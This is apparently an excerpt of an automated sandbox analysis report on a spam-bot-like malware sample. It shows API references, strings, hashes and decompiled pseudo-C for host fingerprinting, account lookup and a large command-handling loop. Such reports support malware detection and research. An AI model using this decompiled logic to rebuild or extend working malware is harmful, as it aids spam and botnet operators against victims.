					goto L16;
				}
			}

0x00408cf2
0x00408cf4
0x00408cf6
0x00408cfc
0x00408dae
0x00408db0
0x00408db0
0x00408d08
0x00408d13
0x00000000
0x00000000
0x00408d1b
0x00408d21
0x00408d24
0x00408d27
0x00408d2a
0x00408d2f
0x00408da1
0x00408da1
0x00408da8
0x00000000
0x00408d31
0x00408d31
0x00408d34
0x00408d37
0x00408d3c
0x00408d50
0x00408d6c
0x00408d6f
0x00408d78
0x00000000
0x00000000
0x00408d7a
0x00408d7d
0x00408d8b
0x00408d8b
0x00408d90
0x00408d9e
0x00408da0
0x00000000
0x00408d90
0x00000000
0x00408d7d
0x00408d5a
0x00408d5f
0x00408d62
0x00408d67
0x00408d67
0x00408d67
0x00000000
0x00408d62
0x00408d46
0x00000000
0x00408d7f
0x00408d7f
0x00408d83
0x00408d84
0x00000000
0x00408d89

APIs

GetTickCount.KERNEL32 ref: 00408D02
GetTickCount.KERNEL32 ref: 00408DA1

Strings

localcfg, xrefs: 00408D19

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: localcfg
API String ID: 536389180-1857712256
Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BFCE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040BFD0
wsprintfA.USER32 ref: 0040C060

Strings

Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CountTickwsprintf
String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
API String ID: 2424974917-1012700906
Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50

Uniqueness

Uniqueness Score: -1.00%

Function 004038F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t29;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t50;

				if(_a8 <= 0) {
					L14:
					return _t29;
				}
				_t29 = E004030FA(0x412c00);
				_v8 = 0;
				if(_a8 <= 0) {
					L13:
					 *0x412c00 =  *0x412c00 & 0x00000000;
					goto L14;
				} else {
					do {
						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4))));
						_t45 =  *((intOrPtr*)(_t50 - 0x24));
						if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
							_t10 = _t50 - 0x1c;
							 *_t10 =  *(_t50 - 0x1c) - 1;
							if( *_t10 < 0) {
								 *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
							}
							 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
						}
						 *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1;
						if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {
							_t43 = 2;
							 *((intOrPtr*)(_t50 - 0x20)) = _t43;
							 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
							_t34 =  *((intOrPtr*)(_t45 + 0x10));
							if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) {
								 *((intOrPtr*)(_t45 + 8)) = _t43;
								if( *0x412bfc == 0) {
									E00406509(_t34);
									 *0x412bfc = 1;
								}
							}
						}
						_v8 = _v8 + 1;
						_t29 = _v8;
					} while (_t29 < _a8);
					goto L13;
				}
			}

APIs

Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128

GetCurrentThreadId.KERNEL32 ref: 00403929
GetCurrentThreadId.KERNEL32 ref: 00403939

Strings

%FROM_EMAIL, xrefs: 00403913

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CurrentThread$CountExchangeInterlockedTick
String ID: %FROM_EMAIL
API String ID: 3716169038-2903620461
Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00477086, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 004770A5
LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,?,?), ref: 004770DD

Strings

|, xrefs: 004770CF

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Name$AccountLookupUser
String ID: |
API String ID: 2370142434-2343686810
Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
Instruction ID: d1c1137c88edb61427b9983e84d13f4a52e4500c9ee4cbc53a8bc3ca2127b636
Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
Instruction Fuzzy Hash: D7111C7290412CEBDB22DBD5CC84ADEB7BCEB05301F908167E506E2250D6749B88CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401B71, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401B71() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				signed int _t12;
				signed int _t28;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v8 = 0;
				asm("stosb");
				_v12 = 0xf;
				_t12 = E00401AC3();
				GetComputerNameA( &_v28,  &_v12);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0);
				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
				_v8 = _t28;
				if(_t28 == 0) {
					return E0040ECA5() & 0x7fffffff;
				}
				return _t28;
			}

0x00401b7e
0x00401b84
0x00401b85
0x00401b86
0x00401b87
0x00401b89
0x00401b8c
0x00401b8d
0x00401b94
0x00401ba3
0x00401bb8
0x00401bc8
0x00401bca
0x00401bcd
0x00000000
0x00401bd8
0x00000000

APIs

Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9

GetComputerNameA.KERNEL32 ref: 00401BA3
GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8

Strings

localcfg, xrefs: 00401B7B

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: AddressComputerInformationLibraryLoadNameProcVolume
String ID: localcfg
API String ID: 2777991786-1857712256
Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
				void* _t15;
				long _t17;
				signed int _t29;
				long* _t31;

				_t29 = 0;
				if(_a8 > 0) {
					do {
						_t31 = _a4 + _t29 * 4;
						_t17 =  *_t31;
						if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {
							 *((char*)(_t17 + 0x11)) = _a20;
							lstrcpynA( *_t31 + 0x12, _a16, 0x3e);
							 *((char*)( *_t31 + 0x4f)) = 0;
							 *((char*)( *_t31 + 0x10)) = _a12;
							if( *((char*)( *_t31 + 0x10)) != 2) {
								_push(0x413640);
							} else {
								_push(0x41363c);
							}
							_t17 = InterlockedIncrement();
						}
						_t29 = _t29 + 1;
					} while (_t29 < _a8);
					return _t17;
				}
				return _t15;
			}

APIs

lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1

Strings

%FROM_EMAIL, xrefs: 0040AB8C

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: IncrementInterlockedlstrcpyn
String ID: %FROM_EMAIL
API String ID: 224340156-2903620461
Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004026B2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON

Download Yara Rule

APIs

gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
inet_ntoa.WS2_32(?), ref: 004026E4

Strings

localcfg, xrefs: 004026CD, 004026D2, 004026DE

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: gethostbyaddrinet_ntoa
String ID: localcfg
API String ID: 2112563974-1857712256
Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAE4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EAE4(CHAR* _a4) {
				struct HINSTANCE__* _t2;

				_t2 =  *0x4136f4; // 0x0
				if(_t2 != 0) {
					L3:
					return GetProcAddress(_t2, _a4);
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x4136f4 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}

0x0040eae4
0x0040eaeb
0x0040eb02
0x0040eb0d
0x0040eaed
0x0040eaf2
0x0040eaf8
0x0040eaff
0x00000000
0x0040eb01
0x0040eb01
0x0040eb01
0x0040eaff

APIs

LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,73AFF210,80000001,00000000), ref: 0040EAF2
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040EB07

Strings

ntdll.dll, xrefs: 0040EAED

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: ntdll.dll
API String ID: 2574300362-2227199552
Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C

Uniqueness

Uniqueness Score: -1.00%

Function 00402F22, Relevance: 5.2, APIs: 4, Instructions: 157
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				void* _v12;
				char _v368;
				void* _t64;
				signed short* _t66;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t76;
				intOrPtr* _t82;
				short _t86;
				intOrPtr* _t87;
				signed int _t94;
				intOrPtr _t96;
				signed int _t99;
				short* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr* _t116;
				void* _t117;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = _a12;
				_t94 = 0;
				 *_t116 = 0;
				_t117 = E00402D21(_a4);
				if(_t117 != 0) {
					if( *_t117 != 0) {
						_v12 = _t117;
						_a12 = _a8;
						while(_t94 < 5) {
							_t9 = _t117 + 8; // 0x8
							_t104 = _t9;
							_t82 = _t9;
							_t10 = _t82 + 1; // 0x9
							_v8 = _t10;
							do {
								_t114 =  *_t82;
								_t82 = _t82 + 1;
							} while (_t114 != 0);
							E0040EE08(_a12, _t104, _t82 - _v8 + 1);
							_t86 =  *((intOrPtr*)(_t117 + 4));
							_a12 = _a12 + 0x100;
							_t122 = _t122 + 0xc;
							 *_t116 =  *_t116 + 1;
							_t117 =  *_t117;
							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
							_t94 = _t94 + 1;
							if(_t117 != 0) {
								continue;
							}
							break;
						}
						HeapFree(GetProcessHeap(), 0, _v12);
						_v8 = _v8 & 0x00000000;
						if( *_t116 == 1) {
							L24:
							return 1;
						}
						_t64 =  *_t116 - 1;
						_a12 = _a8;
						do {
							_t118 = _v8;
							_t99 = _t118;
							if(_t118 >=  *_t116 - 1) {
								L17:
								_t66 = _t121 + _v8 * 2 - 0x6c;
								_t100 = _t121 + _t118 * 2 - 0x6c;
								 *_t66 =  *_t100;
								_t67 = _a12;
								 *_t100 =  *_t66 & 0x0000ffff;
								_t101 = _t67 + 1;
								do {
									_t109 =  *_t67;
									_t67 = _t67 + 1;
								} while (_t109 != 0);
								E0040EE08( &_v368, _a12, _t67 - _t101 + 1);
								_t123 = _t122 + 0xc;
								_t120 = (_t118 << 8) + _a8;
								_t72 = (_t118 << 8) + _a8;
								_t102 = _t72 + 1;
								do {
									_t110 =  *_t72;
									_t72 = _t72 + 1;
								} while (_t110 != 0);
								E0040EE08(_a12, _t120, _t72 - _t102 + 1);
								_t76 =  &_v368;
								_t124 = _t123 + 0xc;
								_t103 = _t76 + 1;
								do {
									_t111 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t111 != 0);
								goto L23;
							} else {
								goto L14;
							}
							do {
								L14:
								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
									_t32 = _t99 + 1; // 0x1
									_t118 = _t32;
								}
								_t99 = _t99 + 1;
							} while (_t99 < _t64);
							goto L17;
							L23:
							E0040EE08(_t120,  &_v368, _t76 - _t103 + 1);
							_a12 = _a12 + 0x100;
							_t122 = _t124 + 0xc;
							_v8 = _v8 + 1;
							_t64 =  *_t116 - 1;
						} while (_v8 < _t64);
						goto L24;
					}
					_t3 = _t117 + 8; // 0x8
					_t105 = _t3;
					_t87 = _t3;
					_t4 = _t87 + 1; // 0x9
					_t115 = _t4;
					do {
						_t96 =  *_t87;
						_t87 = _t87 + 1;
					} while (_t96 != 0);
					E0040EE08(_a8, _t105, _t87 - _t115 + 1);
					 *_t116 =  *_t116 + 1;
					HeapFree(GetProcessHeap(), 0, _t117);
					goto L24;
				}
				return 0;
			}

APIs

Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,73BCEA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
HeapFree.KERNEL32(00000000), ref: 00402F7A

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Heap$FreeHandleLibraryLoadModuleProcess
String ID:
API String ID: 1017166417-0
Opcode ID: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
Opcode Fuzzy Hash: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00473172, Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00472F71: GetModuleHandleA.KERNEL32(?), ref: 00472F8A
Part of subcall function 00472F71: LoadLibraryA.KERNEL32(?), ref: 00472F9A

GetProcessHeap.KERNEL32(00000000,00000000), ref: 004731C3
HeapFree.KERNEL32(00000000), ref: 004731CA

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Heap$FreeHandleLibraryLoadModuleProcess
String ID:
API String ID: 1017166417-0
Opcode ID: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
Instruction ID: 90f18232c7c962e2c84d3ea858a4fd31212af42e8475d562a9541a9be763a761
Opcode Fuzzy Hash: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
Instruction Fuzzy Hash: 0E51DF3190024AEFCF019F64D8849FA77B5FF16305F1481AAEC9AD7311E7769A19CB88

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 5940 Parent PID: 4544 svchost.exeCOMMON

Executed Functions

Function 0032C913, Relevance: 116.9, APIs: 45, Strings: 21, Instructions: 1397
filestringprocessCOMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0032C913() {
				CHAR* _v8;
				CHAR* _v12;
				intOrPtr _v16;
				signed int _v17;
				signed int _v24;
				signed int _v35;
				CHAR* _v39;
				signed int _v52;
				long _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				signed int _v72;
				signed int _v76;
				char _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				struct _PROCESS_INFORMATION _v120;
				char _v408;
				struct _PROCESS_INFORMATION _v424;
				char _v440;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v508;
				intOrPtr _v512;
				char _v640;
				intOrPtr _v688;
				intOrPtr _v720;
				intOrPtr _v728;
				intOrPtr _v732;
				CHAR* _v736;
				char _v740;
				struct _STARTUPINFOA _v808;
				struct _STARTUPINFOA _v876;
				char _v1176;
				void* __ebp;
				intOrPtr _t362;
				intOrPtr _t368;
				void* _t369;
				signed int _t388;
				signed int _t392;
				signed int _t395;
				signed int _t398;
				CHAR* _t403;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed int _t416;
				void* _t417;
				CHAR* _t418;
				signed int _t421;
				CHAR* _t428;
				signed int _t429;
				signed int _t434;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				CHAR* _t444;
				signed int _t449;
				signed int _t453;
				signed int _t456;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t467;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int _t478;
				signed int _t479;
				CHAR* _t480;
				CHAR* _t483;
				signed int _t485;
				signed int _t488;
				signed int _t489;
				CHAR* _t492;
				long _t494;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				signed char* _t502;
				intOrPtr* _t513;
				signed int _t514;
				signed int _t527;
				signed int _t541;
				signed int _t545;
				signed int _t552;
				intOrPtr* _t559;
				signed int _t560;
				signed int _t571;
				signed int _t575;
				signed int _t579;
				signed int _t583;
				signed int _t588;
				signed char _t590;
				signed int _t591;
				intOrPtr* _t595;
				signed int _t596;
				signed int _t599;
				void* _t602;
				intOrPtr* _t607;
				signed char* _t609;
				CHAR* _t613;
				intOrPtr _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t621;
				signed int _t624;
				CHAR* _t630;
				void* _t632;
				signed int _t634;
				CHAR* _t635;
				CHAR* _t636;
				void* _t642;
				signed int _t644;
				void* _t651;
				int _t657;
				int _t673;
				signed int _t681;
				CHAR* _t686;
				intOrPtr _t688;
				void* _t695;
				CHAR* _t701;
				signed int _t705;
				signed int _t709;
				signed int _t711;
				signed int _t712;
				signed int _t723;
				signed char* _t726;
				char _t733;
				char _t734;
				char* _t736;
				void* _t738;
				signed int _t747;
				signed int _t748;
				signed int _t758;
				signed int _t760;
				void* _t763;
				signed int _t764;
				signed int _t765;
				void* _t766;
				void* _t768;
				void* _t769;
				long _t770;
				void* _t773;
				void* _t774;
				void* _t775;
				intOrPtr* _t776;
				intOrPtr* _t777;
				void* _t779;
				void* _t781;
				void* _t782;
				signed int _t789;
				signed int _t791;
				signed int _t793;
				signed int _t795;
				CHAR* _t796;
				signed char* _t797;
				signed int* _t798;
				signed int _t801;
				long _t803;
				signed int _t805;
				void* _t806;
				void* _t807;
				void* _t808;
				void* _t809;
				void* _t811;
				intOrPtr _t819;
				signed int _t820;
				intOrPtr _t821;
				signed int _t822;
				CHAR* _t823;

				_v64 = 0;
				_v68 = 0;
				_t819 =  *0x33366c; // 0x332058
				if(_t819 == 0) {
					L2:
					E0032C517();
					L3:
					_t821 =  *0x33366c; // 0x332058
					if(_t821 == 0) {
						L21:
						__eflags = 0;
						return 0;
					}
					_t822 =  *0x333670; // 0x2
					if(_t822 == 0) {
						goto L21;
					}
					E00332104 = E0032E819(1, "time_cfg", "wtm_c", 0x14);
					 *0x33210c = E0032E819(1, "time_cfg", "wtm_w", 0x28);
					_t362 = E0032E819(1, "time_cfg", "wtm_r", 0x28);
					_t808 = _t807 + 0x30;
					 *0x332108 = _t362;
					_t823 =  *0x3336b0; // 0x3e00000
					if(_t823 != 0) {
						L7:
						_t747 =  *0x333674; // 0x0
						_t688 =  *0x33366c; // 0x332058
						_v12 = 0;
						if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) != 0) {
							L11:
							_t748 = _t747 * 0x45;
							_t365 = _t748 + _t688;
							_t689 =  *((intOrPtr*)(_t748 + _t688 + 0x41));
							if( *((intOrPtr*)(_t748 + _t688 + 0x41)) == 0) {
								goto L21;
							}
							_t368 = E0032F428(E00322684(_t365 + 1), _t689);
							_v16 = _t368;
							_t829 = _t368;
							if(_t368 > 0) {
								_t369 = E0032F43E(_t368,  &_v640, 0xc8, 0); // executed
								_t809 = _t808 + 0x10;
								__eflags = _t369 - 0xc8;
								if(__eflags == 0) {
									E00328F53( &_v640, 0xc8);
									__eflags = _v500 - 0xff;
									_pop(_t695);
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v512 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v508 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									 *0x333684 = 1;
									 *0x333678 = 0;
									 *0x33367c = 0;
									E0032EA84(1, "localcfg", "ip", _v496);
									_v104 = E0032F04E(0);
									_v100 = _t748;
									E0032EA84(1, "localcfg", "srv_time", _v492);
									E0032EA84(1, "localcfg", "local_time", _v104);
									E00328FB6( &_v440,  &_v640);
									E00328FB6( &_v92,  &_v640);
									E0032EE2A(_t695,  &_v740, 0, 0x64);
									_v728 = 1;
									_v688 = 0x100007f;
									_v732 = 1;
									_v720 = 0x1f;
									_v736 = 0;
									_v39 = 0x37;
									_t388 = E0032C65C(_v16,  &_v640,  &_v92, 0x332118, 0x64,  &_v52);
									_t811 = _t809 + 0x68;
									__eflags = _t388;
									if(_t388 > 0) {
										 *0x332148 = 0;
										 *0x33215a = 0;
										while(1) {
											L24:
											_t757 = _v16;
											_t392 = E0032C75D(_v16,  &_v640,  &_v440,  *0x3336b0, 0x100000,  &_v52);
											_t811 = _t811 + 0x18;
											__eflags = _t392 - 0xfffffffe;
											if(_t392 == 0xfffffffe) {
												break;
											}
											__eflags = _t392;
											if(_t392 < 0) {
												continue;
											}
											_t395 = _v39;
											__eflags = _t395;
											if(_t395 == 0) {
												_t789 = 1;
												__eflags = 1;
												do {
													_t398 = 1 << _t789;
													__eflags = _v35 & _t398;
													if((_v35 & _t398) != 0) {
														__eflags =  *(_t789 + 0x33215c);
														if( *(_t789 + 0x33215c) == 0) {
															__eflags = _t789 - 3;
															if(_t789 != 3) {
																E0032F1ED(_t789,  &_v96, 0xa);
																E0032E654(E00328C51, 5,  &_v96);
																_t811 = _t811 + 0x18;
															}
														}
													}
													_t789 = _t789 + 1;
													__eflags = _t789 - 0x20;
												} while (_t789 < 0x20);
												continue;
											}
											__eflags = _t395 - 1;
											if(_t395 == 1) {
												_t403 =  *0x3336b0; // 0x3e00000
												_t697 =  *_t403;
												_v24 = _t697;
												_t748 = _t403[4];
												_v76 = _t748;
												__eflags = _t697 & 0x00000018;
												if((_t697 & 0x00000018) == 0) {
													L177:
													__eflags = _v24 & 0x00000001;
													if((_v24 & 0x00000001) == 0) {
														L179:
														__eflags = _v24 & 0x00000004;
														if((_v24 & 0x00000004) == 0) {
															L182:
															__eflags = _v24 & 0x00000040;
															if((_v24 & 0x00000040) == 0) {
																L186:
																__eflags = _v24 & 0x00000080;
																if((_v24 & 0x00000080) == 0) {
																	L199:
																	__eflags = _v24 & 0x00000100;
																	if((_v24 & 0x00000100) == 0) {
																		L204:
																		__eflags = _v24 & 0x00000400;
																		if((_v24 & 0x00000400) == 0) {
																			L215:
																			_v8 = 0;
																			while(1) {
																				__eflags = _v64;
																				if(_v64 != 0) {
																					goto L228;
																				}
																				_t758 = _v8[0x333300];
																				__eflags = _t758;
																				if(_t758 == 0) {
																					L225:
																					_v8 =  &(_v8[4]);
																					__eflags = _v8 - 0x80;
																					if(_v8 < 0x80) {
																						continue;
																					}
																					__eflags = _v64;
																					if(_v64 != 0) {
																						goto L228;
																					}
																					_v39 = 0;
																					_t408 = E0032C65C(_v16,  &_v640,  &_v92,  *0x3336b0, 0,  &_v52);
																					_t811 = _t811 + 0x18;
																					__eflags = _t408;
																					if(_t408 > 0) {
																						goto L24;
																					}
																					goto L228;
																				}
																				_t409 =  *(_t758 + 0x4c);
																				__eflags = _t409;
																				if(_t409 == 0) {
																					goto L225;
																				}
																				_t410 =  *_t409( &_v76,  &_v39,  *0x3336b0, 0x100000);
																				while(1) {
																					_t811 = _t811 + 0x10;
																					_v52 = _t410;
																					__eflags = _t410;
																					if(_t410 <= 0) {
																						break;
																					}
